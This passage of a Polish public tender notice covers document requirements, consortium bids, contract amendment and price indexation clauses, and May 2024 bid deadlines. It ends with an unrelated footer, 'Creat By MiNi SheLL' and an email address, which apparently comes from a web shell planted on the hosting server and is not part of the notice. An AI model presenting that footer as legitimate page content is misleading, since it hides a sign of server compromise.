notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta - załącznik nr 2 do SWZ, ewentualnie pełnomocnictwa jeśli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum, spółka cywilna). W tym przypadku<br/>ustanawiają pełnomocnika do reprezentowania mocodawców w postępowaniu o udzielenie zamówienia, albo<br/>reprezentowania w postępowaniu i przy zawarciu umowy w sprawie zamówienia publicznego. 2) Wszelka korespondencja<br/>dokonywana będzie wyłącznie z pełnomocnikiem. 3) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała<br/>wszystkich wykonawców występujących wspólnie. 4) Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność<br/>za niewykonanie lub nienależyte wykonanie zobowiązań. 5) Na ofertę wykonawców wspólnie ubiegających się o<br/>zamówienie składają się dokumenty: a) pełnomocnictwo, o którym mowa w art. 58 ust. 2 ustawy Pzp, które zawiera m.in.:<br/>nazwy i adresy członków, nazwę i adres pełnomocnika, zakres pełnomocnictwa, datę udzielenia pełnomocnictwa oraz<br/>podpisy przedstawicieli członków, zgodnie z zasadami reprezentacji; b) oświadczenia wyszczególnione w ust. 1 składa<br/>każdy z wykonawców wspólnie ubiegających się o zamówienie. 6) Jeżeli oferta wykonawców zostanie wybrana jako<br/>najkorzystniejsza, Zamawiający przed zawarciem umowy w sprawie zamówienia publicznego będzie żądać umowy<br/>regulującej współpracę tych wykonawców 7) W przypadku wskazania przez wykonawcę w oświadczeniu (załącznik nr 2),<br/>dostępności podmiotowych środków dowodowych, pod określonymi adresami internetowymi ogólnodostępnych i<br/>bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych podmiotowe środki dowodowe. 8)<br/>Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia sporządzone w języku obcym są składane wraz z<br/>tłumaczeniem na język polski. 9) W przypadku wątpliwości interpretacyjnych dotyczących rodzajów dokumentów oraz formy<br/>ich składania w niniejszym postępowaniu rozstrzygającym jest rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy może nastąpić wyłącznie na podstawie art. 454 i art. 455 ustawy Pzp. 2. Zamawiający na podstawie art. 455<br/>ust. 1 pkt. 1 ustawy Pzp, przewiduje możliwość dokonania zmian wynagrodzenia (ceny) niniejszej umowy w stosunku do<br/>treści oferty, na podstawie której dokonano wyboru Wykonawcy, o kwotę wynikającą ze zmienionych stawek podatku VAT<br/>obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy. 3. Zmiany umowy określone w ust. 1<br/>będą dokonane w formie pisemnej w postaci aneksu pod rygorem nieważności. W odniesieniu do przypadków określonych<br/>w ust. 1, zajście zdarzeń powodujących zmiany musi być uprawdopodobnione przez Stronę wywodzącą z przedmiotowego<br/>zdarzenia skutki prawne. 4. Zamawiający ma prawo odstąpienia od umowy na podstawie art. 456 ustawy Pzp oraz jej<br/>unieważnienia zgodnie z art. 457 ustawy Pzp.<br/>1. Na zasadach określonych w Umowie, na podstawie art. 439 ust. 1 i 2 ustawy Pzp Strony mogą wystąpić z wnioskiem o waloryzację wynagrodzenia należnego wykonawcy w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia. Waloryzacja będzie polegała na podwyższeniu albo obniżeniu ceny jednostkowej podanej w Formularzu ofertowym na zasadach opisanych w niniejszym paragrafie. Wniosek o zmianę wynagrodzenia powinien zawierać opis stanu faktycznego w zakresie aktualnych na dzień jego złożenia kosztów ponoszonych przez Wykonawcę w tej części wynagrodzenia, którego dotyczy zmiana ( tj. w zakresie ceny materiałów oraz kosztów innych składników związanych z realizacją umowy. Wykonawca we wniosku o zmianę wynagrodzenia zobowiązany jest wskazać jaki procent wynagrodzenia umownego brutto za kwartał poprzedzający kwartał, w którym złożył wniosek o waloryzację stanowiły koszty materiałów i usług, o których mowa w art. 439 Pzp.<br/>2. Żadna ze Stron nie będzie uprawniona wystąpić z wnioskiem o dokonanie Waloryzacji wcześniej niż 6 miesięcy od dnia zawarcia Umowy.<br/>3. Waloryzacji będzie podlegało wyłącznie wynagrodzenie wypłacane po 6 miesiącach od dnia zawarcia umowy.<br/>4. Po upływie terminu, o którym mowa w ust. 2, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją Przedmiotu umowy w związku ze wzrostem albo obniżeniem cen określonych we wskaźniku cen towarów i usług konsumpcyjnych ogółem za poprzedni kwartał („Wskaźnik GUS”) ogłaszanym w formie komunikatu Prezesa Głównego Urzędu Statystycznego, o którym mowa w art. 25 ust. 11 ustawy z dnia 17 grudnia 1998 r. o emeryturach i rentach z Funduszu Ubezpieczeń Społecznych (Dz. U. z 2023 r. poz. 1251) każda ze Stron może wystąpić do drugiej Strony z pisemnym wnioskiem o dokonanie Waloryzacji. We wniosku zostanie wskazana nowa cena jednostkowa podana w Formularzu ofertowym na zasadach opisanych w niniejszym paragrafie.<br/>5. Zmiana wynagrodzenia Wykonawcy będzie następować nie częściej niż jeden (1) raz na kwartał kalendarzowy, z zastrzeżeniem, że pierwsza zmiana wynagrodzenia nastąpi nie wcześniej, niż po upływie sześciu (6) miesięcy od dnia zwarcia umowy oraz gdy Wskaźnik, o którym mowa w pkt. 4, przekroczy 5 punktów % w stosunku do Wskaźnika z poprzedniego kwartału. Każda kolejna zmiana wynagrodzenia Wykonawcy nastąpi w przypadku, gdy Wskaźnik, o którym mowa w pkt. 4 przekroczy 5 punktów % w stosunku do wskaźnika z poprzedniego kwartału.<br/>6. Ewentualna Waloryzacja będzie ustalana przez Strony w drodze aneksu do Umowy ze skutkiem od dnia opublikowania komunikatu Prezesa Głównego Urzędu Statystycznego ogłaszającego Wskaźnik GUS („Dzień Ustalenia Waloryzacji”), <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-02 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com